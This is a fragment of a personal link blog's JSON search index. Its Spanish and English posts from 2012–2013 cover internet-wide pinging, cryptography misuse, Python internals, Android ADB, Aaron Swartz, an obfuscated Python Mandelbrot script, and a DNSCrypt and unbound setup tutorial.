sean\ndivisible por 400:\u003c/p\u003e","title":"El día negado"},{"content":" Internet, la red de redes; todas las organizaciones modernas del mundo están conectadas a Internet. Un gran número de individuos disponemos de conexión a Internet, en el trabajo, en el domicilio particular y en el dispositivo móvil.\nEsto nos puede hacer pensar que estamos hablando de un vasto rango de direcciones, dentro de las cuales los atacantes pueden centrar sus ataques en una organización determinada. Por ahora tomaremos como toda Internet el espacio de direcciones de IPv4. Cuando se despliegue y esté en uso IPv6, está claro que todo esto cambiara y habrá un nivel añadido de complejidad.\nPero, ¿y si quisiéramos realizar una acción contra todas y cada una de las direcciones de Internet? ¿Sería viable? ¿Cuánto nos costaría? ¿Recursos técnicos? ¿Recursos físicos? ¿Tiempo? ¿Dinero?\n» Dami Soler securityartwork.es, | securityartwork.es » xkcd.com » Suhas Mathur | suhasmathur.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/13/cuanto-cuesta-hacer-un-ping-todas-las-direcciones-de-internet/","summary":"\u003cblockquote\u003e\n\u003cp\u003eInternet, la red de redes; todas las organizaciones modernas del mundo\nestán conectadas a Internet. Un gran número de individuos disponemos\nde conexión a Internet, en el trabajo, en el domicilio particular y en\nel dispositivo móvil.\u003c/p\u003e\n\u003cp\u003eEsto nos puede hacer pensar que estamos hablando de un vasto rango de\ndirecciones, dentro de las cuales los atacantes pueden centrar sus\nataques en una organización determinada. Por ahora tomaremos como toda\nInternet el espacio de direcciones de IPv4. Cuando se despliegue y\nesté en uso IPv6, está claro que todo esto cambiara y habrá un nivel\nañadido de complejidad.\u003c/p\u003e","title":"¿Cuánto cuesta hacer un ping todas las direcciones de Internet?"},{"content":" No hay duda de que Japón se ha convertido en el paraíso frikinal (con permiso de Howard Wolowitz). Desde los dibujos animados de Mazinger Z de mi niñez al Naruto de la de mis hijos, el país del sol naciente nos ha proporcionado una buena provisión de cine y literatura friki. Pero sin duda, el rey de todo ese paraíso es un enorme lagarto, dinosaurio, dragón o lo que sea. Por supuesto, me refiero a Godzilla.\n» Arturo Quirantes | naukas.com\n","permalink":"http://karpoke.ignaciocano.com/2013/03/09/godzilla/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNo hay duda de que Japón se ha convertido en el paraíso frikinal (con\npermiso de Howard Wolowitz). Desde los dibujos animados de Mazinger Z\nde mi niñez al Naruto de la de mis hijos, el país del sol naciente nos\nha proporcionado una buena provisión de cine y literatura friki. Pero\nsin duda, el rey de todo ese paraíso es un enorme lagarto, dinosaurio,\ndragón o lo que sea. Por supuesto, me refiero a Godzilla.\u003c/p\u003e","title":"Godzilla"},{"content":" Últimamente, tanto en auditorías que realizamos, como en código que encuentro en la red, hay una cosa que me llama poderosamente la atención, y es el mal uso (o uso incompleto) de las funciones de criptografía. Por lo general, el procedimiento que suelen seguir los desarrolladores que no están en contacto con el mundo de la seguridad, suelen consistir en coger un método que venga con la API del lenguaje o en una librería de terceros, buscar el método que implementa el algoritmo de cifrado de turno, rellenar la firma del método y almacenar la salida.\n» Joel Sevilleja | securityartwork.es\n","permalink":"http://karpoke.ignaciocano.com/2013/03/05/el-cifrado-sin-control-no-sirve-de-nada/","summary":"\u003cblockquote\u003e\n\u003cp\u003eÚltimamente, tanto en auditorías que realizamos, como en código que\nencuentro en la red, hay una cosa que me llama poderosamente la\natención, y es el mal uso (o uso incompleto) de las funciones de\ncriptografía. Por lo general, el procedimiento que suelen seguir los\ndesarrolladores que no están en contacto con el mundo de la seguridad,\nsuelen consistir en coger un método que venga con la API del lenguaje\no en una librería de terceros, buscar el método que implementa el\nalgoritmo de cifrado de turno, rellenar la firma del método y\nalmacenar la salida.\u003c/p\u003e","title":"El cifrado sin control, no sirve de nada"},{"content":" This article is an attempt to better understand how the front-end of Python works. Just reading documentation and source code may be a bit boring, so I’m taking a hands-on approach here: I’m going to add an until statement to Python.\nAll the coding for this article was done against the cutting-edge Py3k branch in the Python Mercurial repository mirror.\n» Eli Bendersky | eli.thegreenplace.net\n","permalink":"http://karpoke.ignaciocano.com/2013/03/01/python-internals-adding-a-new-statement-to-python/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis article is an attempt to better understand how the front-end of\nPython works. Just reading documentation and source code may be a bit\nboring, so I’m taking a hands-on approach here: I’m going to add an\nuntil statement to Python.\u003c/p\u003e\n\u003cp\u003eAll the coding for this article was done against the cutting-edge Py3k\nbranch in the Python Mercurial repository mirror.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Eli Bendersky | \u003ca href=\"http://eli.thegreenplace.net/2010/06/30/python-internals-adding-a-new-statement-to-python/\"\u003eeli.thegreenplace.net\u003c/a\u003e\u003c/p\u003e","title":"Python internals: adding a new statement to Python"},{"content":" This is my keyboard rubik’s cube. Must be solved in the normal way, but you have toï’¿ consider the centers and positioning the right way when you are solving the cube.\n» Miguel Alonso | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2013/02/25/keyboard-rubiks-cube/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is my keyboard rubik’s cube. Must be solved in the normal way,\nbut you have toï’¿ consider the centers and positioning the right way\nwhen you are solving the cube.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/eeOCuVbDmQk?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Miguel Alonso | \u003ca href=\"https://www.youtube.com/watch?v=eeOCuVbDmQk\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Keyboard rubik’s cube"},{"content":" Superman finds Hulk somewhere in the Mojave Desert. This is a prelude to a fight sequence in progress and will be posted some time in the future. Animation by Michael Habjan, created with Autodesk Maya 2009, composited and edited in Adobe After Effects CS3. Music done with Propellerhead Reason 5.\n» Michael Habjan | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2013/02/24/superman-vs-hulk-the-fight/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSuperman finds Hulk somewhere in the Mojave Desert. This is a prelude\nto a fight sequence in progress and will be posted some time in the\nfuture. Animation by Michael Habjan, created with Autodesk Maya 2009,\ncomposited and edited in Adobe After Effects CS3. Music done with\nPropellerhead Reason 5.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/L6dj7YCEKhw?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/BbizTBYs-rQ?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/CDBNB2hk5t0?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/nvoWwY64S5w?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/pBbsvavno8I?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Michael Habjan | \u003ca href=\"https://www.youtube.com/user/mhabjan\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Superman vs Hulk - The Fight"},{"content":" Un equipo de investigadores del Instituto de Tecnología de Suecia ha conseguido que unos cuadricópteros sean capaces de lanzar péndulos invertidos y, lo que es más sorprendente, atraparlos al vuelo y equilibrarlos. Para lograrlo, tienen que ser conscientes del ángulo de lanzamiento y de ’aterrizaje’ del péndulo, entre otros factores, y deben tener la capacidad de aprender de sus errores.\n» Guillermo del Palacio | alt1040.com\n","permalink":"http://karpoke.ignaciocano.com/2013/02/23/logran-que-un-cuadricoptero-sea-capaz-de-lanzar-y-equilibrar-un-pendulo-invertido/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUn equipo de investigadores del Instituto de Tecnología de Suecia ha\nconseguido que unos cuadricópteros sean capaces de lanzar péndulos\ninvertidos y, lo que es más sorprendente, atraparlos al vuelo y\nequilibrarlos. Para lograrlo, tienen que ser conscientes del ángulo de\nlanzamiento y de ’aterrizaje’ del péndulo, entre otros factores, y\ndeben tener la capacidad de aprender de sus errores.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/15DIidigArA?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Guillermo del Palacio | \u003ca href=\"http://alt1040.com/2013/02/cuadricoptero-lanza-equilibra-pendulo-invertido\"\u003ealt1040.com\u003c/a\u003e\u003c/p\u003e","title":"Logran que un cuadricóptero sea capaz de lanzar y equilibrar un péndulo invertido"},{"content":" Estudiantes de ingeniería de la Universidad del Sur de Florida han trabajado durante 2 años en un proyecto que les ha llevado a construir una bobina de Tesla de 3 metros de altura capaz de producir corriente alterna. Su creacíon tiene además la particularidad de que se puede configurar para que reproduzca versiones de melodías famosas mediante el tono de los grandes arcos eléctricos que genera. Para demostrarlo, han hecho que imite el tema principal de Super Mario Bros. Este es el resultado que han obtenido:\n» Jose | abadiadigital.com\n","permalink":"http://karpoke.ignaciocano.com/2013/02/22/bobina-de-tesla-reproduce-la-melodia-de-super-mario-bros/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEstudiantes de ingeniería de la Universidad del Sur de Florida han\ntrabajado durante 2 años en un proyecto que les ha llevado a construir\nuna bobina de Tesla de 3 metros de altura capaz de producir corriente\nalterna. Su creacíon tiene además la particularidad de que se puede\nconfigurar para que reproduzca versiones de melodías famosas mediante\nel tono de los grandes arcos eléctricos que genera. Para demostrarlo,\nhan hecho que imite el tema principal de Super Mario Bros. Este es el\nresultado que han obtenido:\u003c/p\u003e","title":"Bobina de Tesla reproduce la melodía de Super Mario Bros"},{"content":"\n","permalink":"http://karpoke.ignaciocano.com/2013/02/22/a-year-in-the-life-of-a-kernel-mantainer-by-greg-kroah-hartman/","summary":"\u003cp\u003e\u003ca href=\"http://imgur.com/ZqIr0OM\"\u003e\u003cimg alt=\"Hosted by imgur\" loading=\"lazy\" src=\"http://i.imgur.com/ZqIr0OM.jpg\"\u003e\u003c/a\u003e\u003c/p\u003e","title":"A year in the life of a kernel mantainer by Greg Kroah-Hartman"},{"content":" Una de las muchas razones por la que una gran cantidad de usuarios elegimos Android es por la facilidad de uso y las muchas cosas que podemos hacer cuando conectamos nuestro dispositivo al ordenador. Muchas veces, al actualizar el teléfono o tablet a una nueva versión, ponerle una ROM cocinada o conseguir permisos de superusuario (root), necesitamos tener más contacto con el aparato que el que nos da el programa que usemos en ese instante (Odín en los Samsung, por ejemplo). El ADB (Android Debug Bridge) es un programa para ordenador que nos servirá de puente para conectar nuestros androides a la computadora y poder así interactuar con ellos de una forma más ”avanzada” y completa. Vamos a ver cómo se hace y algunos comandos básicos.\n» Aitor Santana | elandroidelibre.com\n","permalink":"http://karpoke.ignaciocano.com/2013/02/09/diez-comandos-de-adb-que-deberias-conocer/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUna de las muchas razones por la que una gran cantidad de usuarios\nelegimos Android es por la facilidad de uso y las muchas cosas que\npodemos hacer cuando conectamos nuestro dispositivo al ordenador.\nMuchas veces, al actualizar el teléfono o tablet a una nueva versión,\nponerle una ROM cocinada o conseguir permisos de superusuario (root),\nnecesitamos tener más contacto con el aparato que el que nos da el\nprograma que usemos en ese instante (Odín en los Samsung, por\nejemplo). El ADB (Android Debug Bridge) es un programa para ordenador\nque nos servirá de puente para conectar nuestros androides a la\ncomputadora y poder así interactuar con ellos de una forma más\n”avanzada” y completa. Vamos a ver cómo se hace y algunos comandos\nbásicos.\u003c/p\u003e","title":"Diez comandos de ADB que deberías conocer"},{"content":" Recently I got a Google Android mobile phone ”Samsung Galaxy I7500”. While I’m loving playing with it, I also found some interesting secret codes which can enable/disable lots of hidden settings in the mobile phone. These codes can also show many useful information about the phone.\n» askvg.com\n","permalink":"http://karpoke.ignaciocano.com/2013/02/09/hidden-secret-codes-for-google-android-mobile-phones/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRecently I got a Google Android mobile phone ”Samsung Galaxy I7500”.\nWhile I’m loving playing with it, I also found some interesting secret\ncodes which can enable/disable lots of hidden settings in the mobile\nphone. These codes can also show many useful information about the\nphone.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://www.askvg.com/google-android-hidden-secret-codes/\"\u003easkvg.com\u003c/a\u003e\u003c/p\u003e","title":"Hidden Secret Codes for Google Android Mobile Phones"},{"content":"DNSCrypt proporciona un servicio local para resolver nombres de dominio que permite cifrar el tráfico entre nuestro equipo y el servidor DNS primario, por defecto OpenDNS, lo que ayuda a protegerse de ataques MitM y phishing y proporciona cierta confidencialidad en las peticiones DNS.\nInstalación Para instalarlo, basta que nos decarguemos el paquete con el código fuente:\n$ wget http://download.dnscrypt.org/dnscrypt-proxy/dnscrypt-proxy-1.2.0.tar.bz2 $ wget http://download.dnscrypt.org/dnscrypt-proxy/dnscrypt-proxy-1.2.0.tar.bz2.sig Comprobamos el paquete:\n$ gpg --verify dnscrypt-proxy-1.2.0.tar.bz2.sig dnscrypt-proxy-1.2.0.tar.bz2 gpg: Firmado el vie 12 oct 2012 01:28:27 CEST usando clave DSA ID 1CDEA439 gpg: Imposible comprobar la firma: Clave pública no encontrada Para poder comprobar la firma, buscamos la clave y la añadimos:\n$ gpg --search-keys 1CDEA439 gpg: buscando ;`1CDEA439;\u0026#39; de hkp servidor keys.gnupg.net (1) Jedi/Sector One Frank DENIS (Jedi/Sector One) Frank DENIS (Jedi/Sector One) \u0026lt;0daydigestATpureftpd.org\u0026gt; 1024 bit DSA key 1CDEA439, creado: 2002-03-10 Keys 1-1 of 1 for \u0026#34;1CDEA439\u0026#34;. Introduzca número(s), O)tro, o F)in \u0026gt; 1 gpg: solicitando clave 1CDEA439 de hkp servidor keys.gnupg.net gpg: clave 1CDEA439: clave pública \u0026#34;Jedi/Sector One \u0026#34; importada Ahora volvemos a realizar la comprobación:\n$ gpg --verify dnscrypt-proxy-1.2.0.tar.bz2.sig dnscrypt-proxy-1.2.0.tar.bz2 gpg: Firmado el vie 12 oct 2012 01:28:27 CEST usando clave DSA ID 1CDEA439 gpg: Firma correcta de ;`Jedi/Sector One ;\u0026#39; gpg: alias ;`Frank DENIS (Jedi/Sector One) ;\u0026#39; gpg: alias ;`Frank DENIS (Jedi/Sector One) \u0026lt;0daydigestATpureftpd.org\u0026gt;;\u0026#39; gpg: AVISO: ¡Esta clave no está certificada por una firma de confianza! gpg: No hay indicios de que la firma pertenezca al propietario. Huellas dactilares de la clave primaria: 89F7 B830 0E87 E03C 52B0 5289 926B C517 1CDE A439 Descomprimimos el paquete y lo compilamos:\n$ tar xvjf dnscrypt-proxy-1.2.0.tar.bz2 $ cd dnscrypt-proxy-1.2.0 $ ./configure $ make -j2 Antes de instalarlo podemos realizar algunos tests:\n$ cd src/libnacl $ make -j2 test $ cd ../.. Lo instalamos:\n$ sudo make install Uso La forma más sencilla de utilizarlo es ejecutar:\n$ sudo dnscrypt-proxy --daemonize Acto seguido modificamos la dirección IP del servidor DNS en los parámetros de la conexión. Podemos editar el fichero /etc/resolv.con y poner:\nnameserver 127.0.0.1 Si vemos un aviso dentro del fichero que nos dice que los cambios no serán permanentes, y queremos que lo sean, deberemos modificar la IP del servidor DNS desde la configuración de la red en propiedades del sistema.\nProbamos que el servicio funciona:\n$ dig opendns.com ; \u0026lt;\u0026lt;\u0026gt;\u0026gt; DiG 9.8.1-P1 \u0026lt;\u0026lt;\u0026gt;\u0026gt; opendns.com ;; global options: +cmd ;; Got answer: ;; -\u0026gt;\u0026gt;HEADER\u0026lt;\u0026lt;- opcode: QUERY, status: NOERROR, id: 630 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 8192 ;; QUESTION SECTION: ;opendns.com. IN A ;; ANSWER SECTION: opendns.com. 30 IN A 67.215.92.211 ;; Query time: 91 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Thu Jan 17 17:35:51 2013 ;; MSG SIZE rcvd: 56 $ nslookup opendns.com Server: 127.0.0.1 Address: 127.0.0.1#53 Non-authoritative answer: Name: opendns.com Address: 67.215.92.211 $ nslookup opendns.com localhost Server: localhost Address: 127.0.0.1#53 Non-authoritative answer: Name: opendns.com Address: 67.215.92.211 $ drill opendns.com ;; -\u0026gt;\u0026gt;HEADER\u0026lt;\u0026lt;- opcode: QUERY, rcode: NOERROR, id: 31633 ;; flags: qr rd ra ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;; opendns.com. IN A ;; ANSWER SECTION: opendns.com. 23 IN A 67.215.92.211 ;; AUTHORITY SECTION: ;; ADDITIONAL SECTION: ;; Query time: 76 msec ;; SERVER: 127.0.0.1 ;; WHEN: Thu Jan 17 18:43:31 2013 ;; MSG SIZE rcvd: 45 unbound: caché DNS DNSCrypt únicamente cifra las peticiones DNS hasta nuestro DNS primario, pero no mantiene una caché de las mismas. Podemos optimizar las consultas utilizando un sistema de caché DNS como unbound. Su instalación es sencilla, ya que se encuentra en los repositorios.\nUna vez instalado, necesitaremos hacer dos cambios.\nPrimero, ejecutar DNSCrypt en otro puerto, por ejemplo el 40:\n$ sudo dnscrypt-proxy --daemonize --local-address=127.0.0.1:40 Y segundo, configuramos unbound para que las consultas sean redirigidas a través de dnscrypt-proxy en ese puerto. Añadimos al archivo de configuración /etc/unbound/unbound.conf:\nusername: \u0026#34;unbound\u0026#34; directory: \u0026#34;/etc/unbound\u0026#34; use-syslog: yes do-not-query-localhost: no forward-zone: name: \u0026#34;.\u0026#34; forward-addr: 127.0.0.1@40 Comprobamos que la caché funciona correctamente haciendo dos consultas seguidas al mismo dominio, veremos que la segunda vez tarda 0 ms:\n$ dig opendns.com ... ;; Query time: 0 msec Actualizado el 15 de septiembre de 2013 Si queremos utilizar otros servidores DNS tenemos algunas alternativas más:\nClouDNS es un proveedor australiano que admite el cifrado de DNS para conectarse a sus servidores. Ejecutamos dnscrypt-proxy:\n$ sudo dnscrypt-proxy -d -a 127.0.0.1:40 -r 113.20.6.2:443 $ sudo dnscrypt-proxy -d -a 127.0.0.2:41 -r 113.20.8.17:443 Configuración de unbound:\ndo-not-query-localhost: no forward-zone: name: \u0026#34;.\u0026#34; forward-addr: 127.0.0.1@40 forward-addr: 127.0.0.2@41 Por otro lado, OpenNIC project nos dice los servidores DNS abiertos y seguros más cercanos.\nActualizado el 10 de mayo de 2014 Para instalar dnscrypt en Ubuntu Trusty Tahr (14.04) necesitaremos instalar previamente la librería libsodium. Para facilitar la instalación en varios equipos, he creado los paquetes .deb para libsodium y dnscrypt.\nDNSSEC unbound está configurado por defecto para utilizar DNSSEC, pero parece que OpenDNS aún no lo soporta, por lo que deberemos comentar la siguiente línea en el fichero /etc/unbound/unbound.conf:\nauto-trust-anchor-file: \u0026#34;/var/lib/unbound/root.key\u0026#34; Sólo queda reiniciar el servicio:\n$ sudo service unbound restart Referencias » dnscrypt-proxy » Introducing DNSCrypt (Preview Release) » Como cifrar el trafico DNS y saltarse algunos filtros de navegacion web implementados por algunos ISP\n","permalink":"http://karpoke.ignaciocano.com/2013/01/17/cifrando-el-trafico-dns/","summary":"\u003cp\u003e\u003ca href=\"https://github.com/opendns/dnscrypt-proxy\"\u003eDNSCrypt\u003c/a\u003e proporciona un servicio local para resolver nombres de\ndominio que permite cifrar el tráfico entre nuestro equipo y el servidor\nDNS primario, por defecto OpenDNS, lo que ayuda a protegerse de ataques\nMitM y \u003cem\u003ephishing\u003c/em\u003e y proporciona cierta confidencialidad en las\npeticiones DNS.\u003c/p\u003e\n\u003ch2 id=\"instalación\"\u003eInstalación\u003c/h2\u003e\n\u003cp\u003ePara instalarlo, basta que nos decarguemos el paquete con el código\nfuente:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ wget http://download.dnscrypt.org/dnscrypt-proxy/dnscrypt-proxy-1.2.0.tar.bz2\n$ wget http://download.dnscrypt.org/dnscrypt-proxy/dnscrypt-proxy-1.2.0.tar.bz2.sig\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eComprobamos el paquete:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ gpg --verify dnscrypt-proxy-1.2.0.tar.bz2.sig dnscrypt-proxy-1.2.0.tar.bz2\ngpg: Firmado el vie 12 oct 2012 01:28:27 CEST usando clave DSA ID 1CDEA439\ngpg: Imposible comprobar la firma: Clave pública no encontrada\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara poder comprobar la firma, buscamos la clave y la añadimos:\u003c/p\u003e","title":"Cifrando el tráfico DNS"},{"content":" Ayer se suicidó Aaron Swartz, uno de los activistas de Internet que hicieron de la libertad de expresión y un internet abierto una de sus banderas; parte gigante del freno a SOPA/PIPA, como hacker había colaborado en la especificación RSS a los 14 años y hasta cofundado REDDIT¦ tal vez la suma de sus antecedentes depresivos y la decisión del Gobierno de USA de perseguirlo y hacer un ejemplo con su caso lo llevaron a suicidarse.\n» mariano | uberbin.net\n","permalink":"http://karpoke.ignaciocano.com/2013/01/13/el-caso-de-aaron-swartz/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAyer se suicidó Aaron Swartz, uno de los activistas de Internet que\nhicieron de la libertad de expresión y un internet abierto una de sus\nbanderas; parte gigante del freno a SOPA/PIPA, como hacker había\ncolaborado en la especificación RSS a los 14 años y hasta cofundado\nREDDIT¦ tal vez la suma de sus antecedentes depresivos y la decisión\ndel Gobierno de USA de perseguirlo y hacer un ejemplo con su caso lo\nllevaron a suicidarse.\u003c/p\u003e","title":"EL CASO DE AARON SWARTZ"},{"content":" Here’s a followup to last month’s post about Penrose Tiling in Obfuscated Python. The Mandelbrot set is a traditional favorite among authors of obfuscated code. You can find obfuscated code in C, Perl, Haskell, Python and many other languages. Nearly all examples render the Mandelbrot set as ASCII art. The following Python script, on the other hand, begins as ASCII art:\n_ _ = ( 255, lambda V ,B,c :c and Y(VV+B,B, c -1)if(abs(V)\u0026lt;6)else ( 2+c-4_abs(V)-0.4)/i ) ;v, x=1500,1000;C=range(v*x );import struct;P=struct.pack;M,\nj =\u0026rsquo;\u0026lt;qiihhhh \u0026lsquo;,open(\u0026lsquo;M.bmp\u0026rsquo;,\u0026lsquo;wb\u0026rsquo;).write for X in j(\u0026lsquo;BM\u0026rsquo;+P(M,v_x_3+26,26,12,v,x,1,24))or C: i ,Y=;j(P(\u0026lsquo;BBB\u0026rsquo;,_(lambda T:(T_80+T__9 _i-950_T 99,T70-880T18+701 T __9 ,T*i*(1-T*_45_2)))(sum( [ Y(0,(A%3/3.+X%v+(X/v+ A/3/3.-x/2)/1j)*2.5 /x -2.7,i)**2 for A in C [:9]]) /9) ) )\n» Jeff Preshing | preshing.com\n","permalink":"http://karpoke.ignaciocano.com/2013/01/06/high-resolution-mandelbrot-in-obfuscated-python/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHere’s a followup to last month’s post about Penrose Tiling in\nObfuscated Python.\nThe Mandelbrot set is a traditional favorite among authors of\nobfuscated code. You can find obfuscated code in C, Perl, Haskell,\nPython and many other languages. Nearly all examples render the\nMandelbrot set as ASCII art.\nThe following Python script, on the other hand, begins as ASCII art:\u003c/p\u003e\n\u003cp\u003e_   _                                      =   (\n255,\nlambda\nV       ,B,c\n:c   and Y(V\u003cem\u003eV+B,B,  c\n-1)if(abs(V)\u0026lt;6)else\n(              2+c-4_abs(V)\u003c/em\u003e\u003cem\u003e-0.4)/i\n)  ;v,      x=1500,1000;C=range(v*x\n);import  struct;P=struct.pack;M,\u003cbr\u003e\nj  =\u0026rsquo;\u0026lt;qiihhhh \u0026lsquo;,open(\u0026lsquo;M.bmp\u0026rsquo;,\u0026lsquo;wb\u0026rsquo;).write\nfor X in j(\u0026lsquo;BM\u0026rsquo;+P(M,v_x_3+26,26,12,v,x,1,24))or C:\ni  ,Y=\u003c/em\u003e;j(P(\u0026lsquo;BBB\u0026rsquo;,_(lambda T:(T_80+T__9\n_i-950_T  \u003cem\u003e\u003cem\u003e99,T\u003cem\u003e70-880\u003c/em\u003eT\u003c/em\u003e\u003cem\u003e18+701\u003c/em\u003e\nT  __9     ,T*i\u003c/em\u003e*(1-T*_45_2)))(sum(\n[              Y(0,(A%3/3.+X%v+(X/v+\nA/3/3.-x/2)/1j)*2.5\n/x   -2.7,i)**2 for  \u003cbr\u003e\nA       in C\n[:9]])\n/9)\n)   )\u003c/p\u003e","title":"High-Resolution Mandelbrot in Obfuscated Python"},{"content":" Ser ciberactivista cada día es más peligroso en este país donde asistimos boquiabiertos a la continua detención de personas que han participado en manifestaciones¦ o que iban a hacerlo como sucedió con las detenciones preventivas de miembros de la Coordinadora 25S.\nQue no tenemos nada que ocultar es un pensamiento generalizado, pero no es cierto, máxime cuando se pretende criminalizar hasta la convocatoria de manifestaciones a través de las redes sociales.\n» bofhers.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/30/sin-dejar-rastro-el-ciberactivista-paranoico/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSer ciberactivista cada día es más peligroso en este país donde\nasistimos boquiabiertos a la continua detención de personas que han\nparticipado en manifestaciones¦ o que iban a hacerlo como sucedió con\nlas detenciones preventivas de miembros de la Coordinadora 25S.\u003c/p\u003e\n\u003cp\u003eQue no tenemos nada que ocultar es un pensamiento generalizado, pero\nno es cierto, máxime cuando se pretende criminalizar hasta la\nconvocatoria de manifestaciones a través de las redes sociales.\u003c/p\u003e","title":"Sin dejar rastro, el ciberactivista paranoico"},{"content":" One amazing thing about Linux is that the same code base is used for a different range of computing systems, from supercomputers to very tiny embedded devices. If you stop for a second and think about it, Linux is probably the only OS that has a unified code base. For example, Microsoft and Apple use different kernels for their desktop and mobile OS versions (Windows NT/Windows CE and OS X/iOS). Two of the reasons this is possible on Linux are that the kernel has many abstraction layers and levels of indirection and because its build system allows for creating highly customized kernel binary images.\n» Javier Martínez Canilles | linuxjournal.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/30/kbuild-the-linux-kernel-build-system/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOne amazing thing about Linux is that the same code base is used for a\ndifferent range of computing systems, from supercomputers to very tiny\nembedded devices. If you stop 